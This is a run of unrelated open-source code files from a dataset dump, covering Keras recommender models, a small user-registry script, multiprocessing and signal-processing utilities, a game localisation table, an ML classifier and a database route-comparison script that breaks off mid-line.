merged = layers.concatenate([cross, deep])\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(merged)\n model = keras.Model(inputs=inputs, outputs=outputs)\n return model\n\ndef create_deep_and_cross_model_stacked():\n\n inputs = create_model_inputs()\n x0 = encode_inputs(inputs, style=\"mean\", use_embedding=True)\n\n cross = x0\n for _ in hidden_units_cross:\n units = cross.shape[-1]\n x = layers.Dense(units)(cross)\n cross = x0 * x + cross\n cross = layers.BatchNormalization()(cross)\n cross = layers.ReLU()(cross)\n\n deep = cross\n for units in hidden_units_deep:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n stack = deep\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(stack)\n model = keras.Model(inputs=inputs, outputs=outputs)\n \n return model\n\ndef create_dlrm_model():\n num_inputs, cat_inputs = create_dlrm_inputs()\n embedding_outputs_list = []\n\n for key in CATEGORICAL_FEATURE_NAMES:\n embedding_outputs_list.append(encode_inputs({key: cat_inputs[key]}, True))\n num_encoded_inputs = encode_inputs(num_inputs)\n\n interaction_inputs = []\n\n for deep in embedding_outputs_list:\n for units in hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n deep = num_encoded_inputs\n for units in hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n def dot_product_func(inputs):\n dot_product = inputs[0]\n for idx in range(1,len(inputs)):\n dot_product*= inputs[idx]\n dot_product = layers.BatchNormalization()(dot_product)\n return dot_product\n\n def matrix_mul_func(inputs):\n matrix_mul = []\n\n # print(inputs)\n # for idx, inp in enumerate(inputs):\n # print(inp)\n # print(tf.expand_dims(inp,1))\n # print(tf.expand_dims(inp,2))\n # print(tf.reshape(tf.expand_dims(inp,1)@tf.expand_dims(inp,2),[-1,1]))\n\n for one in inputs:\n one = tf.expand_dims(one,1)\n for two in inputs:\n two = tf.expand_dims(two,2)\n matrix_mul.append(tf.reshape(one @ two ,[-1,1]))\n matrix_mul = layers.concatenate(matrix_mul)\n\n return matrix_mul\n\n #dot_product = dot_product_func(interaction_inputs)\n #input_top = layers.concatenate([deep, dot_product])\n #deep = input_top\n\n matrix_mul = matrix_mul_func(interaction_inputs)\n deep = matrix_mul\n\n for units in hidden_units_dlrm_top:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(deep)\n model = keras.Model(inputs={**num_inputs, **cat_inputs}, outputs=outputs)\n return model\n\ndef create_dlrm_parallel_model():\n num_inputs, cat_inputs = create_dlrm_inputs()\n embedding_outputs_list = []\n\n for key in CATEGORICAL_FEATURE_NAMES:\n embedding_outputs_list.append(encode_inputs({key: cat_inputs[key]}, True))\n num_encoded_inputs = encode_inputs(num_inputs)\n cat_embedded_outputs = layers.concatenate(embedding_outputs_list)\n\n interaction_inputs = []\n\n for deep in embedding_outputs_list:\n for units in hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = 
layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n deep = num_encoded_inputs\n for units in hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n def matrix_mul_func(inputs):\n matrix_mul = []\n\n # print(inputs)\n # for idx, inp in enumerate(inputs):\n # print(inp)\n # print(tf.expand_dims(inp,1))\n # print(tf.expand_dims(inp,2))\n # print(tf.reshape(tf.expand_dims(inp,1)@tf.expand_dims(inp,2),[-1,1]))\n\n for one in inputs:\n one = tf.expand_dims(one,1)\n for two in inputs:\n two = tf.expand_dims(two,2)\n matrix_mul.append(tf.reshape(one @ two ,[-1,1]))\n matrix_mul = layers.concatenate(matrix_mul)\n\n return matrix_mul\n\n #dot_product = dot_product_func(interaction_inputs)\n #input_top = layers.concatenate([deep, dot_product])\n #deep = input_top\n\n matrix_mul = matrix_mul_func(interaction_inputs)\n\n inputs = layers.concatenate([num_encoded_inputs,cat_embedded_outputs])\n deep = inputs\n\n for units in hidden_units_dlrm_top:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n merged = layers.concatenate([matrix_mul,deep])\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(merged)\n model = keras.Model(inputs={**num_inputs, **cat_inputs}, outputs=outputs)\n return model\n\ndef create_modified_dlrm_model():\n num_inputs, cat_inputs = create_dlrm_inputs()\n interaction_inputs = []\n\n for key in CATEGORICAL_FEATURE_NAMES:\n interaction_inputs.append(encode_inputs({key: cat_inputs[key]}, True))\n num_encoded_inputs = encode_inputs(num_inputs)\n\n hidden_units_dlrm_bottom = [32,16]\n deep = num_encoded_inputs\n for units in hidden_units_dlrm_bottom:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n interaction_inputs.append(deep)\n\n # dot_product = [1]*max_embedding_length\n # for input in interaction_inputs:\n # dot_product = np.dot(input, dot_product)\n\n def dot_product_func(inputs):\n dot_product = inputs[0]\n for idx in range(1,len(inputs)):\n dot_product*= inputs[idx]\n return dot_product\n dot_product = dot_product_func(interaction_inputs)\n\n print(dot_product)\n print(deep)\n\n input_top = deep\n for input in interaction_inputs:\n input_top = layers.concatenate([input_top, input])\n deep = input_top\n for units in hidden_units_dlrm_top:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n merged = layers.concatenate([deep, dot_product])\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(merged)\n model = keras.Model(inputs={**num_inputs, **cat_inputs}, outputs=outputs)\n return model\n\ndef create_candidate_generator():\n \n inputs = create_model_inputs()\n #print(inputs)\n encoded_inputs = encode_inputs(inputs,\"mean\",True)\n #print(encoded_inputs)\n deep = encoded_inputs\n for units in hidden_units_deep:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep) \n #deep = layers.Dense(units=NUM_CLASSES, activation=\"linear\")(deep)\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(deep)\n model = keras.Model(inputs=inputs, outputs=outputs)\n \n return 
model\n\n\n#wide_and_deep_model = create_wide_and_deep_model()\n#wide_and_cross_model = create_deep_and_cross_model()\n#wide_and_cross_stacked = create_deep_and_cross_model_stacked()\n#dlrm_model = create_dlrm_model()\n#dlrm_parallel_model = create_dlrm_parallel_model()\ncandidate_generator = create_candidate_generator()\n\nrun_experiment(candidate_generator)\n\n","repo_name":"davidGasser/DLRecSys_Movies","sub_path":"candidate.py","file_name":"candidate.py","file_ext":"py","file_size_in_byte":28576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10931028967","text":"def perguntar():\n resposta = input(\"O que deseja realizar?\" +\n \" - Para Inserir um usuário\" +\n \"
- Para Pesquisar um usuário\" +\n \" - Para Excluir um usuário\" +\n \" - Para Listar um usuário: \").upper()\n return resposta\n\ndef inserir(dicionario):\n chave=input(\"Digite o login: \").upper()\n dicionario[chave]=[input(\"Digite o nome: \").upper(),\n input(\"Digite a última data de acesso: \"),\n input(\"Qual a última estação acessada: \").upper()]\n\n\ndef pesquisar(dicionario, chave):\n lista=dicionario.get(chave)\n if lista!=None:\n print(\"Nome...........: \" + lista[0])\n print(\"Último acesso..: \" + lista[1])\n print(\"Última estação.: \" + lista[2])\n\ndef excluir(dicionario, chave):\n if dicionario.get(chave)!=None:\n del dicionario[chave]\n print(\"Objeto Eliminado\")\n\ndef listar(dicionario):\n for chave, valor in dicionario.items():\n print(\"Objeto......\")\n print(\"Login: \", chave)\n print(\"Dados: \", valor)\n\n\n#from Capitulo4_Dicionarios.Funcoes import *\nusuarios={}\n\nopcao=perguntar()\nwhile opcao==\"I\" or opcao==\"P\" or opcao==\"E\" or opcao==\"L\":\n if opcao==\"I\":\n inserir(usuarios)\n if opcao==\"P\":\n pesquisar(usuarios,input(\"Qual login deseja pesquisar? \"))\n if opcao == \"E\":\n excluir(usuarios,input(\"Qual login deseja excluir? \"))\n if opcao == \"L\":\n listar(usuarios)\n opcao = perguntar()","repo_name":"StephanyDuarte/CourseFiapON.py","sub_path":"Funçoes.py","file_name":"Funçoes.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74928624800","text":"import multiprocessing\nimport time \n\nstart = time.perf_counter() \n\ndef do_something(seconds):\n print(f'Sleeping {seconds} second(s') \n time.sleep(seconds) \n print('Done sleeping...') \n\n\n\"\"\"\nBelow part is without multiprocessing. \n\"\"\"\n# do_something() \n# do_something()\n\n\n\"\"\"\nBelow part is showing about the multiprocessing example. \n\"\"\"\n# we just need to assign the orginal function, no need to call\n# p1 = multiprocessing.Process(target=do_something)\n# p2 = multiprocessing.Process(target=do_something) \n\n# p1.start() \n# p2.start() \n\n# p1.join() \n# p2.join() \n\nprocesses = []\nfor _ in range(10):\n p = multiprocessing.Process(target=do_something, args=[1.5]) \n p.start() \n processes.append(p) \n\n\nfor process in processes:\n process.join() \n\nfinish = time.perf_counter() \nprint(f'Finish in {round(finish-start, 2)} second(s)')","repo_name":"ujass/crack_the_interview","sub_path":"multi_processing/multi_process.py","file_name":"multi_process.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71221774242","text":"# -*- coding: utf-8 -*-\n#==============================================================================#\n# #\n# This is a patched file that was originally written by Cyan Worlds Inc. #\n# See the file AUTHORS for more info about the contributors of the changes #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. #\n# #\n# You may re-use the code in this file within the context of Uru. 
#\n# #\n#==============================================================================#\nfrom Plasma import *\nfrom PlasmaVaultConstants import *\nxFolderIDToFolderName = {\n PtVaultStandardNodes.kUserDefinedNode: 'D\\xe9fini par l\\'utilisateur',\n PtVaultStandardNodes.kInboxFolder: 'Bo\\xeete de r\\xe9ception',\n PtVaultStandardNodes.kBuddyListFolder: 'Amis',\n PtVaultStandardNodes.kIgnoreListFolder: 'Liste \\xe0 ignorer',\n PtVaultStandardNodes.kPeopleIKnowAboutFolder: 'R\\xe9cents',\n PtVaultStandardNodes.kChronicleFolder: 'Chronique',\n PtVaultStandardNodes.kAvatarOutfitFolder: 'Armoire',\n PtVaultStandardNodes.kAgeTypeJournalFolder: 'Journaux d\\'\\xc2ges',\n PtVaultStandardNodes.kSubAgesFolder: 'Sous-\\xc2ges',\n PtVaultStandardNodes.kHoodMembersFolder: 'Voisins',\n PtVaultStandardNodes.kAllPlayersFolder: 'Tous les joueurs',\n PtVaultStandardNodes.kAgeMembersFolder: 'Joueurs de l\\'\\xc2ge',\n PtVaultStandardNodes.kAgeJournalsFolder: 'Dossiers des journaux d\\'\\xc2ges',\n PtVaultStandardNodes.kCanVisitFolder: 'Visiteurs potentiels',\n PtVaultStandardNodes.kAgeOwnersFolder: 'Propri\\xe9taires',\n PtVaultStandardNodes.kPublicAgesFolder: 'Quartiers publics',\n PtVaultStandardNodes.kAgesIOwnFolder: '\\xc2ges poss\\xe9d\\xe9s',\n PtVaultStandardNodes.kAgesICanVisitFolder: '\\xc2ges visitables',\n PtVaultStandardNodes.kAvatarClosetFolder: 'Armoire \\xe0 avatar'\n}\nxMayorOfNeighborhood = 'Maire'\nxMemberOfNeighborhood = 'Membre'\nxNeighborhoodPrivate = 'priv\\xe9'\nxNeighborhoodPublic = 'public'\nxDateTimeFormat = '%d/%m/%y %H:%M'\nxDateFormat = '%d/%m/%y'\nxImagerMessage = 'De\\xa0: %s\\nObjet\\xa0: %s\\n\\n%s'\nxHoodWelcome = 'Bienvenue \\xe0 %s. Pour plus d\\'informations, rendez-vous dans la salle de classe'\nxDeleteNeighborhoodBook = '\\xcates-vous s\\xfbr(e) de vouloir supprimer ce Livre et ainsi perdre votre inscription dans ce quartier ?'\nxDeleteBook = '\\xcates-vous s\\xfbr(e) de vouloir supprimer ce Livre et ainsi annuler votre progression dans cet \\xc2ge ?'\nxNeighborhood = 'Quartier'\nxTranslatedAgeNames = {\n 'Ferry Terminal': 'Terminal de ferry',\n 'Tokotah Alley': 'All\\xe9e Tokotah',\n 'Palace Alcove': 'Alc\\xf4ve du palais',\n 'Library Courtyard': 'Cour de la biblioth\\xe8que',\n 'Concert Hall Foyer': 'Hall de la salle de concert',\n 'Eder Kemo': 'Eder Kemo',\n 'Eder Gira': 'Eder Gira',\n 'Gahreesen': 'Gahreesen',\n 'Kadish': 'Kadish',\n 'Nexus': 'Nexus',\n 'Neighborhood': 'Quartier',\n 'Relto': 'Relto',\n 'Teledahn': 'Teledahn',\n 'Bevin': 'Bevin',\n 'Kirel': 'Kirel',\n 'Rezeero Observation': 'D\\'ni-Rezeero observation',\n 'Rezeero': 'D\\'ni-Rezeero',\n 'Great Zero': 'D\\'ni-Rezeero'\n}\nxPossesive = 'de'\n\ndef LocalizeAgeName(displayName):\n localizedName = displayName.strip()\n if (localizedName == 'D\\'ni-Rudenna'):\n try:\n sdl = xPsnlVaultSDL()\n if ((sdl['TeledahnPoleState'][0] > 5) or ((sdl['KadishPoleState'][0] > 5) or ((sdl['GardenPoleState'][0] > 5) or (sdl['GarrisonPoleState'][0] > 5)))):\n localizedName = 'D\\'ni-Rudenna'\n else:\n localizedName = '???'\n except:\n localizedName = '???'\n elif (localizedName == 'Ae\\'gura'):\n localizedName = 'D\\'ni-Ae\\'gura'\n elif (localizedName == 'GreatZero'):\n localizedName = 'D\\'ni-Rezeero'\n elif (not (localizedName.startswith('D\\'ni'))):\n if (localizedName[(len(localizedName) - 12):] == 'Neighborhood'):\n localizedName = (localizedName[:(len(localizedName) - 12)] + xNeighborhood)\n return localizedName\n try:\n localizedName = xTranslatedAgeNames[localizedName]\n return localizedName\n except:\n pass\n 
apostropheLoc = localizedName.rfind(\"'\")\n if (apostropheLoc == -1):\n return localizedName\n if ((apostropheLoc + 3) >= len(localizedName)):\n return localizedName\n if (not (((localizedName[(apostropheLoc + 1)] == 's') and (localizedName[(apostropheLoc + 2)] == ' ')))):\n return localizedName\n userName = localizedName[:apostropheLoc]\n ageName = localizedName[(apostropheLoc + 3):]\n localizedName = ((((ageName + ' ') + xPossesive) + ' ') + userName)\n return localizedName\n\n","repo_name":"Atrion/Offline-Ki","sub_path":"tpots-fixes/xFrench.py","file_name":"xFrench.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42360410622","text":"import os\nimport pandas as pd\nos.chdir(\"/Users/Sarah/Desktop\")\ndf = pd.read_csv(\"blood_markers.csv\")\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom xgboost import XGBClassifier\nfrom sklearn import svm\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn import metrics\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import accuracy_score, f1_score, roc_auc_score\nfrom sklearn.metrics import classification_report\n\n#Prepare data\ndf.dropna(inplace=True)\ncsv_read = df[~df['Group'].isin(['analysis error/unclassifiable', 'insuff follow-up'])]\ny = csv_read['Group']\ny = y.replace({'single seizure': 0, 'epilepsy': 1, 'PSE': 1})\nX = csv_read.drop(['Group', 'patient_number'], axis=1)\nX['Gender'] = X['Gender'].replace({'Male': 0, 'Female': 1})\n\n#Split data into train and test set\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.33, random_state = 42)\n\n#Scale data\nscaler = MinMaxScaler(feature_range=(0, 1))\nX_train_scaled = scaler.fit_transform(X_train)\nX_test_scaled = scaler.transform(X_test)\n\nXGBmodel = XGBClassifier()\nRFmodel = RandomForestClassifier()\nNNmodel = MLPClassifier()\nSVMmodel = SVC()\n\nmodels = [XGBmodel, RFmodel, SVMmodel, NNmodel]\nfor model in models:\n model.fit(X_train_scaled, y_train)\n\naccuracy = [metrics.accuracy_score(y_test, model.predict(X_test_scaled)) for model in models]\nauc_scores = [roc_auc_score(y_test, model.predict(X_test_scaled)) for model in models]\nf1_scores = [f1_score(y_test, model.predict(X_test_scaled)) for model in models]\n\nmax_index = auc_scores.index(max(auc_scores))\nmodel = models[max_index]\nprint(accuracy)\nprint(auc_scores)\nprint(f1_scores)\nprint('Top performing model', model)","repo_name":"Sarah-UU/Master-Thesis","sub_path":"Classification.py","file_name":"Classification.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40571574067","text":"from __future__ import division\nimport numpy as np\nfrom numpy.fft import rfft\nfrom numpy import argmax, mean, diff, log\nfrom scipy.signal import blackmanharris\nfrom scipy.fftpack import fft\n\n\n\nfrom scipy.signal import butter, lfilter, filtfilt\n\nNan = float(\"nan\") # Not-a-number capitalized like None, True, False\nInf = float(\"inf\") # infinite value capitalized ...\n\neps = np.finfo(\"float32\").eps\n\n\ndef mad(a, normalize=True, axis=0):\n \n from scipy.stats import norm\n c = norm.ppf(3/4.) 
if normalize else 1\n return np.median(np.abs(a - np.median(a)) / c, axis=axis)\n\n\ndef rssq(x):\n return np.sqrt(np.sum(np.abs(x)**2))\n\n\ndef peak2rms(x):\n num = max(abs(x))\n den = rms (x)\n return num/den\n\ndef rms(x):\n return np.sqrt(np.mean(x**2))\n\ndef range_bytes (win): \n return range(win) \n\ndef energy(x):\n energy = np.sum(x**2) / len(x) # axis = 1 is column sum\n return energy\n\ndef zcr_2(frame):\n count = len(frame)\n countZ = np.sum(np.abs(np.diff(np.sign(frame)))) / 2\n return (np.float64(countZ) / np.float64(count-1.0))\n\ndef zcr(x):\n count = (np.diff(np.sign(x)) != 0).sum()\n rate = count/len(x)\n return rate\n \n \n\"\"\" Frequency-domain features \"\"\"\n\ndef peakfreq_from_fft(sig, fs):\n \"\"\"\n Estimate frequency from peak of FFT\n \"\"\"\n # Compute Fourier transform of windowed signal\n windowed = sig * blackmanharris(len(sig))\n f = rfft(windowed)\n\n # Find the peak and interpolate to get a more accurate peak\n i = argmax(abs(f)) - 1 # Just use this for less-accurate, naive version\n true_i = parabolic(log(abs(f)), i)[0]\n\n # Convert to equivalent frequency\n return fs * true_i / len(windowed)\n\ndef parabolic(f, x):\n xv = 1/2 * (f[x-1] - f[x+1]) / (f[x-1] - 2 * f[x] + f[x+1]) + x\n yv = f[x] - 1/4 * (f[x-1] - f[x+1]) * (xv - x)\n return (xv, yv)\n\ndef spectralCentroidAndSpread(x, fs):\n \"\"\"Computes spectral centroid of frame (given abs(FFT))\"\"\"\n \n X = abs(fft(x)) # get fft magnitude\n ind = (np.arange(1, len(X) + 1)) * (fs/(2.0 * len(X)))\n\n Xt = X.copy()\n Xt = Xt / Xt.max()\n NUM = np.sum(ind * Xt)\n DEN = np.sum(Xt) + eps\n\n # Centroid:\n C = (NUM / DEN)\n\n # Spread:\n S = np.sqrt(np.sum(((ind - C) ** 2) * Xt) / DEN)\n\n # Normalize:\n C = C / (fs / 2.0)\n S = S / (fs / 2.0)\n\n return (C, S)\n\n\n\n\n\ndef spectralRollOff(x, c, fs):\n \"\"\"Computes spectral roll-off\"\"\"\n X = abs(fft(x)) # get fft magnitude\n totalEnergy = np.sum(X ** 2)\n fftLength = len(X)\n Thres = c*totalEnergy\n # Ffind the spectral rolloff as the frequency position \n # where the respective spectral energy is equal to c*totalEnergy\n CumSum = np.cumsum(X ** 2) + eps\n [a, ] = np.nonzero(CumSum > Thres)\n if len(a) > 0:\n mC = np.float64(a[0]) / (float(fftLength))\n else:\n mC = 0.0\n return (mC)\n\n\ndef chromaFeaturesInit(nfft, fs):\n \"\"\"\n This function initializes the chroma matrices used in the calculation of the chroma features\n \"\"\"\n freqs = np.array([((f + 1) * fs) / (2 * nfft) for f in range(nfft)]) \n Cp = 27.50 \n nChroma = np.round(12.0 * np.log2(freqs / Cp)).astype(int)\n\n nFreqsPerChroma = np.zeros((nChroma.shape[0], ))\n\n uChroma = np.unique(nChroma)\n for u in uChroma:\n idx = np.nonzero(nChroma == u)\n nFreqsPerChroma[idx] = idx[0].shape\n \n return nChroma, nFreqsPerChroma\n\n\ndef chromaFeatures(x, fs, nChroma, nFreqsPerChroma):\n \n\n X = abs(fft(x)) # get fft magnitude\n chromaNames = ['A', 'A#', 'B', 'C', 'C#', 'D', \n 'D#', 'E', 'F', 'F#', 'G', 'G#']\n spec = X**2 \n if nChroma.max()nChroma.shape[0])[0][0] \n C = np.zeros((nChroma.shape[0],))\n C[nChroma[0:I-1]] = spec \n C /= nFreqsPerChroma\n finalC = np.zeros((12, 1))\n newD = int(np.ceil(C.shape[0] / 12.0) * 12)\n C2 = np.zeros((newD, ))\n C2[0:C.shape[0]] = C\n C2 = C2.reshape(int(C2.shape[0]/12), 12)\n #for i in range(12):\n # finalC[i] = np.sum(C[i:C.shape[0]:12])\n finalC = np.matrix(np.sum(C2, axis=0)).T\n finalC /= spec.sum()\n\n\n return chromaNames, finalC\n\ndef recursive_sta_lta(a, nsta, nlta):\n\n \"\"\"\n\n Recursive STA/LTA written in Python.\n\n .. 
note::\n\n There exists a faster version of this trigger wrapped in C\n\n called :func:`~obspy.signal.trigger.recursive_sta_lta` in this module!\n\n :type a: NumPy :class:`~numpy.ndarray`\n\n :param a: Seismic Trace\n\n :type nsta: int\n\n :param nsta: Length of short time average window in samples\n\n :type nlta: int\n\n :param nlta: Length of long time average window in samples\n\n :rtype: NumPy :class:`~numpy.ndarray`\n\n :return: Characteristic function of recursive STA/LTA\n\n .. seealso:: [Withers1998]_ (p. 98) and [Trnkoczy2012]_\n\n \"\"\"\n\n try:\n\n a = a.tolist()\n\n except Exception:\n\n pass\n\n ndat = len(a)\n\n # compute the short time average (STA) and long time average (LTA)\n\n # given by Evans and Allen\n\n csta = 1. / nsta\n\n clta = 1. / nlta\n\n sta = 0.\n\n lta = 1e-99 # avoid zero division\n\n charfct = [0.0] * len(a)\n\n icsta = 1 - csta\n\n iclta = 1 - clta\n\n for i in range(1, ndat):\n\n sq = a[i] ** 2\n\n sta = csta * sq + icsta * sta\n\n lta = clta * sq + iclta * lta\n\n charfct[i] = sta / lta\n\n if i < nlta:\n\n charfct[i] = 0.\n\n return np.array(charfct)","repo_name":"huazhz/ml4ms","sub_path":"utils/sigproc.py","file_name":"sigproc.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"20970743680","text":"with open('i4.txt') as f:\n data = f.readlines()\ndata = [d.strip().split('-') for d in data]\n\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\nvalid = 0\nfor room in data:\n char_count = {}\n name = ''.join(room[:-1])\n name2 = ' '.join(room[:-1])\n unique_chars = set(name)\n for char in unique_chars:\n char_count[char] = name.count(char)\n char_count = ''.join([k for k, v in sorted(char_count.items(), key=lambda item: (-item[1], item[0]))][:5])\n checksum = room[-1].split('[')[1][:-1]\n id_num = int(room[-1].split('[')[0])\n if checksum == char_count:\n valid += id_num\n shift = id_num % 26\n name3 = ''\n for n in name2:\n if n == ' ':\n name3 = name3 + ' '\n elif shift + alphabet.index(n) >= 25:\n i = shift + alphabet.index(n) - 25\n name3 = name3 + alphabet[i-1]\n else:\n i = shift + alphabet.index(n)\n name3 = name3 + alphabet[i]\n print(f'{name3}, {id_num}')","repo_name":"JamesCaddick/aoc","sub_path":"2016/c4.py","file_name":"c4.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3407943564","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# AMIU copyleft 2021\n# Roberto Marzocchi\n\n'''\nLo script verifica le variazioni e manda CSV a assterritorio@amiu.genova.it giornalmemte con la sintesi delle stesse \n'''\n\nimport os, sys, re # ,shutil,glob\nimport inspect, os.path\n\nimport xlsxwriter\n\n\n#import getopt # per gestire gli input\n\n#import pymssql\n\nimport psycopg2\n\nimport cx_Oracle\n\nimport datetime\nimport holidays\nfrom workalendar.europe import Italy\n\n\nfrom credenziali import db, port, user, pwd, host, user_mail, pwd_mail, port_mail, smtp_mail\n\n\n#import requests\n\nimport logging\nimport email, smtplib, ssl\nimport mimetypes\nfrom email.mime.multipart import MIMEMultipart\nfrom email import encoders\nfrom email.message import Message\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.text import MIMEText\nfrom invio_messaggio import *\n\n\nfrom crea_dizionario_da_query import *\n\n\nimport csv\n\n#LOG\n\nfilename = 
inspect.getframeinfo(inspect.currentframe()).filename\npath = os.path.dirname(os.path.abspath(filename))\n\n'''#path=os.path.dirname(sys.argv[0]) \n#tmpfolder=tempfile.gettempdir() # get the current temporary directory\nlogfile='{}/log/variazioni_importazioni.log'.format(path)\n#if os.path.exists(logfile):\n# os.remove(logfile)\n\nlogging.basicConfig(format='%(asctime)s\\t%(levelname)s\\t%(message)s',\n filemode='a', # overwrite or append\n filename=logfile,\n level=logging.DEBUG)\n'''\n\n\npath=os.path.dirname(sys.argv[0]) \n#tmpfolder=tempfile.gettempdir() # get the current temporary directory\nlogfile='{}/log/variazioni_importazioni.log'.format(path)\nerrorfile='{}/log/error_variazioni_importazioni.log'.format(path)\n#if os.path.exists(logfile):\n# os.remove(logfile)\n\n\n\n\n\n\n\n# Create a custom logger\nlogging.basicConfig(\n level=logging.DEBUG,\n handlers=[\n ]\n)\n\nlogger = logging.getLogger()\n\n# Create handlers\nc_handler = logging.FileHandler(filename=errorfile, encoding='utf-8', mode='w')\nf_handler = logging.StreamHandler()\n#f_handler = logging.FileHandler(filename=logfile, encoding='utf-8', mode='w')\n\n\nc_handler.setLevel(logging.ERROR)\nf_handler.setLevel(logging.DEBUG)\n\n\n# Add handlers to the logger\nlogger.addHandler(c_handler)\nlogger.addHandler(f_handler)\n\n\ncc_format = logging.Formatter('%(asctime)s\\t%(levelname)s\\t%(message)s')\n\nc_handler.setFormatter(cc_format)\nf_handler.setFormatter(cc_format)\n\n\ndef cfr_tappe(tappe_sit, tappe_uo, logger):\n ''' Effettua il confronto fra le tappe di SIT e quelle di UO'''\n #logger.info('Richiamo la funzione cfr_tappe')\n check=0\n if len(tappe_sit) == len(tappe_uo) :\n k=0\n while k < len(tappe_sit):\n #logger.debug(tappe_sit[k][0])\n #logger.debug(tappe_uo[k][0])\n \n # nume_seq 0\n if tappe_sit[k][0]!=tappe_uo[k][0]:\n check=1\n # id_via 1\n if tappe_sit[k][1]!=tappe_uo[k][1]:\n check=1 \n # riferimento 3\n if (tappe_uo[k][3] is None and tappe_sit[k][3] is None) or ( (not tappe_uo[k][3] or re.search(\"^\\s*$\", tappe_uo[k][3])) and (not tappe_sit[k][3] or re.search(\"^\\s*$\", tappe_sit[k][3])) ):\n check1=0\n else:\n if tappe_sit[k][3]!=tappe_uo[k][3]:\n check=1\n logger.warning('rif SIT = .{}., rif UO = {}'.format(tappe_sit[k][3], tappe_uo[k][3]))\n \n \n # frequenza 4\n if tappe_sit[k][4]!=tappe_uo[k][4]:\n check=1 \n # tipo_el 5\n if tappe_sit[k][5]!=tappe_uo[k][5]:\n check=1 \n #id_el 6\n if tappe_sit[k][6]!=tappe_uo[k][6]:\n check=1 \n # nota via 7\n #logger.debug('SIT = {}, UO = {}'.format(tappe_sit[k][7], tappe_uo[k][7]))\n if (tappe_uo[k][7] is None and tappe_sit[k][7] is None) or ( (not tappe_uo[k][7] or re.search(\"^\\s*$\", tappe_uo[k][7])) and (not tappe_sit[k][7] or re.search(\"^\\s*$\", tappe_sit[k][7])) ):\n check1=0\n \n else:\n if tappe_sit[k][7].strip()!=tappe_uo[k][7].strip():\n check=1\n logger.warning('SIT = {}, UO = {}'.format(tappe_sit[k][7], tappe_uo[k][7]))\n \n k+=1\n else:\n check=1\n return check\n\n\n\n\n\n\ndef main():\n # carico i mezzi sul DB PostgreSQL\n logger.info('Connessione al db')\n conn = psycopg2.connect(dbname=db,\n port=port,\n user=user,\n password=pwd,\n host=host)\n\n curr = conn.cursor()\n #conn.autocommit = True\n\n\n id_p= 155762\n cod_p= '0213244201'\n oggi1='21/11/2022'\n \n # Mi connetto al DB oracle UO\n cx_Oracle.init_oracle_client(percorso_oracle) # necessario configurare il client oracle correttamente\n #cx_Oracle.init_oracle_client() # necessario configurare il client oracle correttamente\n parametri_con='{}/{}@//{}:{}/{}'.format(user_uo,pwd_uo, 
